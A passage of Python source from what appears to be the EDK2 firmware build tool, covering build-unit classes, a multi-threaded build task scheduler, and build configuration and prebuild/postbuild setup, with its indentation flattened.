# @param Dependency The BuildUnit(s) which must be completed in advance
# @param WorkingDir The directory build command starts in
#
def __init__(self, Obj, BuildCommand, Target, Dependency, WorkingDir="."):
self.BuildObject = Obj
self.Dependency = Dependency
self.WorkingDir = WorkingDir
self.Target = Target
self.BuildCommand = BuildCommand
if not BuildCommand:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(Obj.BuildTarget, Obj.ToolChain, Obj.Arch),
ExtraData=str(Obj))
## str() method
#
# It just returns the string representation of self.BuildObject
#
# @param self The object pointer
#
def __str__(self):
return str(self.BuildObject)
## "==" operator method
#
# It just compares self.BuildObject with "Other". So self.BuildObject must
# provide its own __eq__() method.
#
# @param self The object pointer
# @param Other The other BuildUnit object compared to
#
def __eq__(self, Other):
return Other and self.BuildObject == Other.BuildObject \
and Other.BuildObject \
and self.BuildObject.Arch == Other.BuildObject.Arch
## hash() method
#
# It just returns the hash value of self.BuildObject which must be hashable.
#
# @param self The object pointer
#
def __hash__(self):
return hash(self.BuildObject) + hash(self.BuildObject.Arch)
def __repr__(self):
return repr(self.BuildObject)
## The smallest module unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for module build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only ModuleAutoGen object.
#
class ModuleMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The ModuleAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, BuildCommand,Target):
Dependency = [ModuleMakeUnit(La, BuildCommand,Target) for La in Obj.LibraryAutoGenList]
BuildUnit.__init__(self, Obj, BuildCommand, Target, Dependency, Obj.MakeFileDir)
if Target in [None, "", "all"]:
self.Target = "tbuild"
## The smallest platform unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for platform build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only PlatformAutoGen object.
#
class PlatformMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The PlatformAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, BuildCommand, Target):
Dependency = [ModuleMakeUnit(Lib, BuildCommand, Target) for Lib in self.BuildObject.LibraryAutoGenList]
Dependency.extend([ModuleMakeUnit(Mod, BuildCommand,Target) for Mod in self.BuildObject.ModuleAutoGenList])
BuildUnit.__init__(self, Obj, BuildCommand, Target, Dependency, Obj.MakeFileDir)
## The class representing the task of a module build or platform build
#
# This class manages the build tasks in multi-thread build mode. Its jobs include
# scheduling thread running, catching thread error, monitor the thread status, etc.
#
class BuildTask:
# queue for tasks waiting for schedule
_PendingQueue = OrderedDict()
_PendingQueueLock = threading.Lock()
# queue for tasks ready for running
_ReadyQueue = OrderedDict()
_ReadyQueueLock = threading.Lock()
# queue for run tasks
_RunningQueue = OrderedDict()
_RunningQueueLock = threading.Lock()
# queue containing all build tasks, in case duplicate build
_TaskQueue = OrderedDict()
# flag indicating error occurs in a running thread
_ErrorFlag = threading.Event()
_ErrorFlag.clear()
_ErrorMessage = ""
# BoundedSemaphore object used to control the number of running threads
_Thread = None
# flag indicating if the scheduler is started or not
_SchedulerStopped = threading.Event()
_SchedulerStopped.set()
## Start the task scheduler thread
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def StartScheduler(MaxThreadNumber, ExitFlag):
SchedulerThread = Thread(target=BuildTask.Scheduler, args=(MaxThreadNumber, ExitFlag))
SchedulerThread.name = "Build-Task-Scheduler"
SchedulerThread.daemon = False
SchedulerThread.start()
# wait for the scheduler to be started, especially useful in Linux
while not BuildTask.IsOnGoing():
time.sleep(0.01)
## Scheduler method
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def Scheduler(MaxThreadNumber, ExitFlag):
BuildTask._SchedulerStopped.clear()
try:
# use BoundedSemaphore to control the maximum running threads
BuildTask._Thread = BoundedSemaphore(MaxThreadNumber)
#
# scheduling loop, which will exits when no pending/ready task and
# indicated to do so, or there's error in running thread
#
while (len(BuildTask._PendingQueue) > 0 or len(BuildTask._ReadyQueue) > 0 \
or not ExitFlag.is_set()) and not BuildTask._ErrorFlag.is_set():
EdkLogger.debug(EdkLogger.DEBUG_8, "Pending Queue (%d), Ready Queue (%d)"
% (len(BuildTask._PendingQueue), len(BuildTask._ReadyQueue)))
# get all pending tasks
BuildTask._PendingQueueLock.acquire()
BuildObjectList = list(BuildTask._PendingQueue.keys())
#
# check if their dependency is resolved, and if true, move them
# into ready queue
#
for BuildObject in BuildObjectList:
Bt = BuildTask._PendingQueue[BuildObject]
if Bt.IsReady():
BuildTask._ReadyQueue[BuildObject] = BuildTask._PendingQueue.pop(BuildObject)
BuildTask._PendingQueueLock.release()
# launch build thread until the maximum number of threads is reached
while not BuildTask._ErrorFlag.is_set():
# empty ready queue, do nothing further
if len(BuildTask._ReadyQueue) == 0:
break
# wait for active thread(s) exit
BuildTask._Thread.acquire(True)
# start a new build thread
Bo, Bt = BuildTask._ReadyQueue.popitem()
# move into running queue
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue[Bo] = Bt
BuildTask._RunningQueueLock.release()
Bt.Start()
# avoid tense loop
time.sleep(0.01)
# avoid tense loop
time.sleep(0.01)
# wait for all running threads exit
if BuildTask._ErrorFlag.is_set():
EdkLogger.quiet("\nWaiting for all build threads exit...")
# while not BuildTask._ErrorFlag.is_set() and \
while len(BuildTask._RunningQueue) > 0:
EdkLogger.verbose("Waiting for thread ending...(%d)" % len(BuildTask._RunningQueue))
EdkLogger.debug(EdkLogger.DEBUG_8, "Threads [%s]" % ", ".join(Th.name for Th in threading.enumerate()))
# avoid tense loop
time.sleep(0.1)
except BaseException as X:
#
# TRICK: hide the output of threads left running, so that the user can
# catch the error message easily
#
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "build thread scheduler error\n\t%s" % str(X)
BuildTask._PendingQueue.clear()
BuildTask._ReadyQueue.clear()
BuildTask._RunningQueue.clear()
BuildTask._TaskQueue.clear()
BuildTask._SchedulerStopped.set()
## Wait for all running method exit
#
@staticmethod
def WaitForComplete():
BuildTask._SchedulerStopped.wait()
## Check if the scheduler is running or not
#
@staticmethod
def IsOnGoing():
return not BuildTask._SchedulerStopped.is_set()
## Abort the build
@staticmethod
def Abort():
if BuildTask.IsOnGoing():
BuildTask._ErrorFlag.set()
BuildTask.WaitForComplete()
## Check if there's error in running thread
#
# Since the main thread cannot catch exceptions in other thread, we have to
# use threading.Event to communicate this formation to main thread.
#
@staticmethod
def HasError():
return BuildTask._ErrorFlag.is_set()
## Get error message in running thread
#
# Since the main thread cannot catch exceptions in other thread, we have to
# use a static variable to communicate this message to main thread.
#
@staticmethod
def GetErrorMessage():
return BuildTask._ErrorMessage
## Factory method to create a BuildTask object
#
# This method will check if a module is building or has been built. And if
# true, just return the associated BuildTask object in the _TaskQueue. If
# not, create and return a new BuildTask object. The new BuildTask object
# will be appended to the _PendingQueue for scheduling later.
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
@staticmethod
def New(BuildItem, Dependency=None):
if BuildItem in BuildTask._TaskQueue:
Bt = BuildTask._TaskQueue[BuildItem]
return Bt
Bt = BuildTask()
Bt._Init(BuildItem, Dependency)
BuildTask._TaskQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.acquire()
BuildTask._PendingQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.release()
return Bt
## The real constructor of BuildTask
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
def _Init(self, BuildItem, Dependency=None):
self.BuildItem = BuildItem
self.DependencyList = []
if Dependency is None:
Dependency = BuildItem.Dependency
else:
Dependency.extend(BuildItem.Dependency)
self.AddDependency(Dependency)
# flag indicating build completes, used to avoid unnecessary re-build
self.CompleteFlag = False
## Check if all dependent build tasks are completed or not
#
def IsReady(self):
ReadyFlag = True
for Dep in self.DependencyList:
if Dep.CompleteFlag == True:
continue
ReadyFlag = False
break
return ReadyFlag
## Add dependent build task
#
# @param Dependency The list of dependent build objects
#
def AddDependency(self, Dependency):
for Dep in Dependency:
if not Dep.BuildObject.IsBinaryModule and not Dep.BuildObject.CanSkipbyCache(GlobalData.gModuleCacheHit):
self.DependencyList.append(BuildTask.New(Dep)) # BuildTask list
## The thread wrapper of LaunchCommand function
#
# @param Command A list or string contains the call of the command
# @param WorkingDir The directory in which the program will be running
#
def _CommandThread(self, Command, WorkingDir):
try:
self.BuildItem.BuildObject.BuildTime = LaunchCommand(Command, WorkingDir,self.BuildItem.BuildObject)
self.CompleteFlag = True
# Run hash operation post dependency to account for libs
# Run if --hash or --binary-destination
if GlobalData.gUseHashCache and not GlobalData.gBinCacheSource:
self.BuildItem.BuildObject.GenModuleHash()
if GlobalData.gBinCacheDest:
self.BuildItem.BuildObject.GenCMakeHash()
except:
#
# TRICK: hide the output of threads left running, so that the user can
# catch the error message easily
#
if not BuildTask._ErrorFlag.is_set():
GlobalData.gBuildingModule = "%s [%s, %s, %s]" % (str(self.BuildItem.BuildObject),
self.BuildItem.BuildObject.Arch,
self.BuildItem.BuildObject.ToolChain,
self.BuildItem.BuildObject.BuildTarget
)
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "%s broken\n %s [%s]" % \
(threading.current_thread().name, Command, WorkingDir)
# indicate there's a thread is available for another build task
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue.pop(self.BuildItem)
BuildTask._RunningQueueLock.release()
BuildTask._Thread.release()
## Start build task thread
#
def Start(self):
EdkLogger.quiet("Building ... %s" % repr(self.BuildItem))
Command = self.BuildItem.BuildCommand + [self.BuildItem.Target]
self.BuildTread = Thread(target=self._CommandThread, args=(Command, self.BuildItem.WorkingDir))
self.BuildTread.name = "build thread"
self.BuildTread.daemon = False
self.BuildTread.start()
## The class contains the information related to EFI image
#
class PeImageInfo():
## Constructor
#
# Constructor will load all required image information.
#
# @param BaseName The full file path of image.
# @param Guid The GUID for image.
# @param Arch Arch of this image.
# @param OutputDir The output directory for image.
# @param DebugDir The debug directory for image.
# @param ImageClass PeImage Information
#
def __init__(self, BaseName, Guid, Arch, OutputDir, DebugDir, ImageClass):
self.BaseName = BaseName
self.Guid = Guid
self.Arch = Arch
self.OutputDir = OutputDir
self.DebugDir = DebugDir
self.Image = ImageClass
self.Image.Size = (self.Image.Size // 0x1000 + 1) * 0x1000
## The class implementing the EDK2 build process
#
# The build process includes:
# 1. Load configuration from target.txt and tools_def.txt in $(WORKSPACE)/Conf
# 2. Parse DSC file of active platform
# 3. Parse FDF file if any
# 4. Establish build database, including parse all other files (module, package)
# 5. Create AutoGen files (C code file, depex file, makefile) if necessary
# 6. Call build command
#
class Build():
## Constructor
#
# Constructor will load all necessary configurations, parse platform, modules
# and packages and the establish a database for AutoGen.
#
# @param Target The build command target, one of gSupportedTarget
# @param WorkspaceDir The directory of workspace
# @param BuildOptions Build options passed from command line
#
def __init__(self, Target, WorkspaceDir, BuildOptions,log_q):
self.WorkspaceDir = WorkspaceDir
self.Target = Target
self.PlatformFile = BuildOptions.PlatformFile
self.ModuleFile = BuildOptions.ModuleFile
self.ArchList = BuildOptions.TargetArch
self.ToolChainList = BuildOptions.ToolChain
self.BuildTargetList= BuildOptions.BuildTarget
self.Fdf = BuildOptions.FdfFile
self.FdList = BuildOptions.RomImage
self.FvList = BuildOptions.FvImage
self.CapList = BuildOptions.CapName
self.SilentMode = BuildOptions.SilentMode
self.ThreadNumber = 1
self.SkipAutoGen = BuildOptions.SkipAutoGen
self.Reparse = BuildOptions.Reparse
self.SkuId = BuildOptions.SkuId
if self.SkuId:
GlobalData.gSKUID_CMD = self.SkuId
self.ConfDirectory = BuildOptions.ConfDirectory
self.SpawnMode = True
self.BuildReport = BuildReport(BuildOptions.ReportFile, BuildOptions.ReportType)
self.AutoGenTime = 0
self.MakeTime = 0
self.GenFdsTime = 0
self.MakeFileName = ""
TargetObj = TargetTxtDict()
ToolDefObj = ToolDefDict((os.path.join(os.getenv("WORKSPACE"),"Conf")))
self.TargetTxt = TargetObj.Target
self.ToolDef = ToolDefObj.ToolDef
GlobalData.BuildOptionPcd = BuildOptions.OptionPcd if BuildOptions.OptionPcd else []
#Set global flag for build mode
GlobalData.gIgnoreSource = BuildOptions.IgnoreSources
GlobalData.gUseHashCache = BuildOptions.UseHashCache
GlobalData.gBinCacheDest = BuildOptions.BinCacheDest
GlobalData.gBinCacheSource = BuildOptions.BinCacheSource
GlobalData.gEnableGenfdsMultiThread = not BuildOptions.NoGenfdsMultiThread
GlobalData.gDisableIncludePathCheck = BuildOptions.DisableIncludePathCheck
if GlobalData.gBinCacheDest and not GlobalData.gUseHashCache:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination must be used together with --hash.")
if GlobalData.gBinCacheSource and not GlobalData.gUseHashCache:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-source must be used together with --hash.")
if GlobalData.gBinCacheDest and GlobalData.gBinCacheSource:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination can not be used together with --binary-source.")
if GlobalData.gBinCacheSource:
BinCacheSource = os.path.normpath(GlobalData.gBinCacheSource)
if not os.path.isabs(BinCacheSource):
BinCacheSource = mws.join(self.WorkspaceDir, BinCacheSource)
GlobalData.gBinCacheSource = BinCacheSource
else:
if GlobalData.gBinCacheSource is not None:
EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-source.")
if GlobalData.gBinCacheDest:
BinCacheDest = os.path.normpath(GlobalData.gBinCacheDest)
if not os.path.isabs(BinCacheDest):
BinCacheDest = mws.join(self.WorkspaceDir, BinCacheDest)
GlobalData.gBinCacheDest = BinCacheDest
else:
if GlobalData.gBinCacheDest is not None:
EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-destination.")
GlobalData.gDatabasePath = os.path.normpath(os.path.join(GlobalData.gConfDirectory, GlobalData.gDatabasePath))
if not os.path.exists(os.path.join(GlobalData.gConfDirectory, '.cache')):
os.makedirs(os.path.join(GlobalData.gConfDirectory, '.cache'))
self.Db = BuildDB
self.BuildDatabase = self.Db.BuildObject
self.Platform = None
self.ToolChainFamily = None
self.LoadFixAddress = 0
self.UniFlag = BuildOptions.Flag
self.BuildModules = []
self.HashSkipModules = []
self.Db_Flag = False
self.LaunchPrebuildFlag = False
self.PlatformBuildPath = os.path.join(GlobalData.gConfDirectory, '.cache', '.PlatformBuild')
if BuildOptions.CommandLength:
GlobalData.gCommandMaxLength = BuildOptions.CommandLength
# print dot character during doing some time-consuming work
self.Progress = Utils.Progressor()
# print current build environment and configuration
EdkLogger.quiet("%-16s = %s" % ("WORKSPACE", os.environ["WORKSPACE"]))
if "PACKAGES_PATH" in os.environ:
# WORKSPACE env has been converted before. Print the same path style with WORKSPACE env.
EdkLogger.quiet("%-16s = %s" % ("PACKAGES_PATH", os.path.normcase(os.path.normpath(os.environ["PACKAGES_PATH"]))))
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_PATH", os.environ["EDK_TOOLS_PATH"]))
if "EDK_TOOLS_BIN" in os.environ:
# Print the same path style with WORKSPACE env.
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_BIN", os.path.normcase(os.path.normpath(os.environ["EDK_TOOLS_BIN"]))))
EdkLogger.quiet("%-16s = %s" % ("CONF_PATH", GlobalData.gConfDirectory))
if "PYTHON3_ENABLE" in os.environ:
PYTHON3_ENABLE = os.environ["PYTHON3_ENABLE"]
if PYTHON3_ENABLE != "TRUE":
PYTHON3_ENABLE = "FALSE"
EdkLogger.quiet("%-16s = %s" % ("PYTHON3_ENABLE", PYTHON3_ENABLE))
if "PYTHON_COMMAND" in os.environ:
EdkLogger.quiet("%-16s = %s" % ("PYTHON_COMMAND", os.environ["PYTHON_COMMAND"]))
self.InitPreBuild()
self.InitPostBuild()
if self.Prebuild:
EdkLogger.quiet("%-16s = %s" % ("PREBUILD", self.Prebuild))
if self.Postbuild:
EdkLogger.quiet("%-16s = %s" % ("POSTBUILD", self.Postbuild))
if self.Prebuild:
self.LaunchPrebuild()
TargetObj = TargetTxtDict()
ToolDefObj = ToolDefDict((os.path.join(os.getenv("WORKSPACE"), "Conf")))
self.TargetTxt = TargetObj.Target
self.ToolDef = ToolDefObj.ToolDef
if not (self.LaunchPrebuildFlag and os.path.exists(self.PlatformBuildPath)):
self.InitBuild()
self.AutoGenMgr = None
EdkLogger.info("")
os.chdir(self.WorkspaceDir)
self.log_q = log_q
GlobalData.file_lock = mp.Lock()
# Init cache data for local only
GlobalData.gPackageHashFile = dict()
GlobalData.gModulePreMakeCacheStatus = dict()
GlobalData.gModuleMakeCacheStatus = dict()
GlobalData.gHashChainStatus = dict()
GlobalData.gCMakeHashFile = dict()
GlobalData.gModuleHashFile = dict()
GlobalData.gFileHashDict = dict()
GlobalData.gModuleAllCacheStatus = set()
GlobalData.gModuleCacheHit = set()
def StartAutoGen(self,mqueue, DataPipe,SkipAutoGen,PcdMaList,cqueue):
try:
if SkipAutoGen:
return True,0
feedback_q = mp.Queue()
error_event = mp.Event()
FfsCmd = DataPipe.Get("FfsCommand")
if FfsCmd is None:
FfsCmd = {}
GlobalData.FfsCmd = FfsCmd
auto_workers = [AutoGenWorkerInProcess(mqueue,DataPipe.dump_file,feedback_q,GlobalData.file_lock,cqueue,self.log_q,error_event) for _ in range(self.ThreadNumber)]
self.AutoGenMgr = AutoGenManager(auto_workers,feedback_q,error_event)
self.AutoGenMgr.start()
for w in auto_workers:
w.start()
if PcdMaList is not None:
for PcdMa in PcdMaList:
# SourceFileList calling sequence impact the makefile string sequence.
# Create cached SourceFileList here to unify its calling sequence for both
# CanSkipbyPreMakeCache and CreateCodeFile/CreateMakeFile.
RetVal = PcdMa.SourceFileList
# Force cache miss for PCD driver
if GlobalData.gUseHashCache and not GlobalData.gBinCacheDest and self.Target in [None, "", "all"]:
cqueue.put((PcdMa.MetaFile.Path, PcdMa.Arch, "PreMakeCache", False))
PcdMa.CreateCodeFile(False)
PcdMa.CreateMakeFile(False,GenFfsList = DataPipe.Get("FfsCommand").get((PcdMa.MetaFile.Path, PcdMa.Arch),[]))
PcdMa.CreateAsBuiltInf()
# Force cache miss for PCD driver
if GlobalData.gBinCacheSource and self.Target in [None, "", "all"]:
cqueue.put((PcdMa.MetaFile.Path, PcdMa.Arch, "MakeCache", False))
self.AutoGenMgr.join()
rt = self.AutoGenMgr.Status
err = 0
if not rt:
err = UNKNOWN_ERROR
return rt, err
except FatalError as e:
return False, e.args[0]
except:
return False, UNKNOWN_ERROR
## Add TOOLCHAIN and FAMILY declared in DSC [BuildOptions] to ToolsDefTxtDatabase.
#
# Loop through the set of build targets, tool chains, and archs provided on either
# the command line or in target.txt to discover FAMILY and TOOLCHAIN delclarations
# in [BuildOptions] sections that may be within !if expressions that may use
# $(TARGET), $(TOOLCHAIN), $(TOOLCHAIN_TAG), or $(ARCH) operands.
#
def GetToolChainAndFamilyFromDsc (self, File):
SavedGlobalDefines = GlobalData.gGlobalDefines.copy()
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
for BuildToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = BuildToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = BuildToolChain
for BuildArch in self.ArchList:
GlobalData.gGlobalDefines['ARCH'] = BuildArch
dscobj = self.BuildDatabase[File, BuildArch]
for KeyFamily, Key, KeyCodeBase in dscobj.BuildOptions:
try:
Target, ToolChain, Arch, Tool, Attr = Key.split('_')
except:
continue
if ToolChain == TAB_STAR or Attr != TAB_TOD_DEFINES_FAMILY:
continue
try:
Family = dscobj.BuildOptions[(KeyFamily, Key, KeyCodeBase)]
Family = Family.strip().strip('=').strip()
except:
continue
if TAB_TOD_DEFINES_FAMILY not in self.ToolDef.ToolsDefTxtDatabase:
self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_FAMILY] = {}
if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_FAMILY]:
self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_FAMILY][ToolChain] = Family
if TAB_TOD_DEFINES_BUILDRULEFAMILY not in self.ToolDef.ToolsDefTxtDatabase:
self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_BUILDRULEFAMILY] = {}
if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_BUILDRULEFAMILY]:
self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_BUILDRULEFAMILY][ToolChain] = Family
if TAB_TOD_DEFINES_TOOL_CHAIN_TAG not in self.ToolDef.ToolsDefTxtDatabase:
self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG] = []
if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG]:
self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG].append(ToolChain)
GlobalData.gGlobalDefines = SavedGlobalDefines
## Load configuration
#
# This method will parse target.txt and get the build configurations.
#
def LoadConfiguration(self):
# if no ARCH given in command line, get it from target.txt
if not self.ArchList:
self.ArchList = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TARGET_ARCH]
self.ArchList = tuple(self.ArchList)
# if no build target given in command line, get it from target.txt
if not self.BuildTargetList:
self.BuildTargetList = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TARGET]
# if no tool chain given in command line, get it from target.txt
if not self.ToolChainList:
self.ToolChainList = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TOOL_CHAIN_TAG]
if self.ToolChainList is None or len(self.ToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE, ExtraData="No toolchain given. Don't know how to build.\n")
if not self.PlatformFile:
PlatformFile = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_ACTIVE_PLATFORM]
if not PlatformFile:
# Try to find one in current directory
WorkingDirectory = os.getcwd()
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.dsc')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_MISSING,
ExtraData="There are %d DSC files in %s. Use '-p' to specify one.\n" % (FileNum, WorkingDirectory))
elif FileNum == 1:
PlatformFile = FileList[0]
else:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="No active platform specified in target.txt or command line! Nothing can be built.\n")
self.PlatformFile = PathClass(NormFile(PlatformFile, self.WorkspaceDir), self.WorkspaceDir)
self.GetToolChainAndFamilyFromDsc (self.PlatformFile)
# check if the tool chains are defined or not
NewToolChainList = []
for ToolChain in self.ToolChainList:
if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG]:
EdkLogger.warn("build", "Tool chain [%s] is not defined" % ToolChain)
else:
NewToolChainList.append(ToolChain)
# if no tool chain available, break the build
if len(NewToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="[%s] not defined. No toolchain available for build!\n" % ", ".join(self.ToolChainList))
else:
self.ToolChainList = NewToolChainList
ToolChainFamily = []
ToolDefinition = self.ToolDef.ToolsDefTxtDatabase
for Tool in self.ToolChainList:
if TAB_TOD_DEFINES_FAMILY not in ToolDefinition or Tool not in ToolDefinition[TAB_TOD_DEFINES_FAMILY] \
or not ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool]:
EdkLogger.warn("build", "No tool chain family found in configuration for %s. Default to MSFT." % Tool)
ToolChainFamily.append(TAB_COMPILER_MSFT)
else:
ToolChainFamily.append(ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool])
self.ToolChainFamily = ToolChainFamily
self.ThreadNumber = ThreadNum()
## Initialize build configuration
#
# This method will parse DSC file and merge the configurations from
# command line and target.txt, then get the final build configurations.
#
def InitBuild(self):
# parse target.txt, tools_def.txt, and platform file
self.LoadConfiguration()
# Allow case-insensitive for those from command line or configuration file
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
def InitPreBuild(self):
self.LoadConfiguration()
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = self.BuildTargetList[0]
if self.ArchList:
GlobalData.gGlobalDefines['ARCH'] = self.ArchList[0]
if self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = self.ToolChainList[0]
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = self.ToolChainList[0]
if self.ToolChainFamily:
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[0]
if 'PREBUILD' in GlobalData.gCommandLineDefines:
self.Prebuild = GlobalData.gCommandLineDefines.get('PREBUILD')
else:
self.Db_Flag = True
Platform = self.Db.MapPlatform(str(self.PlatformFile))
self.Prebuild = str(Platform.Prebuild)
if self.Prebuild:
PrebuildList = []
#
# Evaluate all arguments and convert arguments that are WORKSPACE
# relative paths to absolute paths. Filter arguments that look like
# flags or do not follow the file/dir naming rules to avoid false
# positives on this conversion.
#
for Arg in self.Prebuild.split():
#
# Do not modify Arg if it looks like a flag or an absolute file path
#
if Arg.startswith('-') or os.path.isabs(Arg):
PrebuildList.append(Arg)
continue
#
# Do not modify Arg if it does not look like a Workspace relative
# path that starts with a valid package directory name
#
if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
PrebuildList.append(Arg)
continue
#
# If Arg looks like a WORKSPACE relative path, then convert to an
# absolute path and check to see if the file exists.
#
Temp = mws.join(self.WorkspaceDir, Arg)
if os.path.isfile(Temp):
Arg = Temp
PrebuildList.append(Arg)
self.Prebuild = ' '.join(PrebuildList)
self.Prebuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def InitPostBuild(self):
if 'POSTBUILD' in GlobalData.gCommandLineDefines:
self.Postbuild = GlobalData.gCommandLineDefines.get('POSTBUILD')
else:
Platform = self.Db.MapPlatform(str(self.PlatformFile))
self.Postbuild = str(Platform.Postbuild)
if self.Postbuild:
PostbuildList = []
#
# Evaluate all arguments and convert arguments that are WORKSPACE
# relative paths to absolute paths. Filter arguments that look like
# flags or do not follow the file/dir naming rules to avoid false
# positives on this conversion.
#
for Arg in self.Postbuild.split():
#
# Do not modify Arg if it looks like a flag or an absolute file path
#
if Arg.startswith('-') or os.path.isabs(Arg):
PostbuildList.append(Arg)
continue
#
# Do not modify Arg if it does not look like a Workspace relative
# path that starts with a valid package directory name
#
if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
PostbuildList.append(Arg)
continue
#
# If Arg looks like a WORKSPACE relative path, then convert to an
# absolute path and check to see if the file exists.
#
Temp = mws.join(self.WorkspaceDir, Arg)
if os.path.isfile(Temp):
Arg = Temp
PostbuildList.append(Arg)
self.Postbuild = ' '.join(PostbuildList)
self.Postbuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def PassCommandOption(self, BuildTarget, TargetArch, ToolChain, PlatformFile, Target):
BuildStr = ''
if GlobalData.gCommand and isinstance(GlobalData.gCommand, list):
BuildStr += ' ' + ' '.join(GlobalData.gCommand)
TargetFlag = False
ArchFlag = False
ToolChainFlag = False
PlatformFileFlag = False
if GlobalData.gOptions and not GlobalData.gOptions.BuildTarget:
TargetFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.TargetArch:
ArchFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.ToolChain:
ToolChainFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.PlatformFile:
PlatformFileFlag = True
if TargetFlag and BuildTarget:
if isinstance(BuildTarget, list) or isinstance(BuildTarget, tuple):
BuildStr += ' -b ' + ' -b '.join(BuildTarget)
elif isinstance(BuildTarget, str):
BuildStr += ' -b ' + BuildTarget
if ArchFlag and TargetArch:
if isinstance(TargetArch, list) or isinstance(TargetArch, tuple):
BuildStr += ' -a ' + ' -a '.join(TargetArch)
elif isinstance(TargetArch, str):
BuildStr += ' -a ' + TargetArch
if ToolChainFlag and ToolChain:
if isinstance(ToolChain, list) or isinstance(ToolChain, tuple):
BuildStr += ' -t ' + ' -t '.join(ToolChain)
elif isinstance(ToolChain, str):
BuildStr += ' -t ' + ToolChain
if PlatformFileFlag and PlatformFile:
if isinstance(PlatformFile, list) or isinstance(PlatformFile, tuple):
BuildStr += ' -p ' + ' -p '.join(PlatformFile)
elif isinstance(PlatformFile, str):
BuildStr += ' -p' + PlatformFile
BuildStr += ' --conf=' + GlobalData.gConfDirectory
if Target:
BuildStr += ' ' + Target
return BuildStr
def LaunchPrebuild(self):
if self.Prebuild:
EdkLogger.info("\n- Prebuild Start -\n")
self.LaunchPrebuildFlag = True
#
# The purpose of .PrebuildEnv file is capture environment variable settings set by the prebuild script
# and preserve them for the rest of the main build step, because the child process environment will
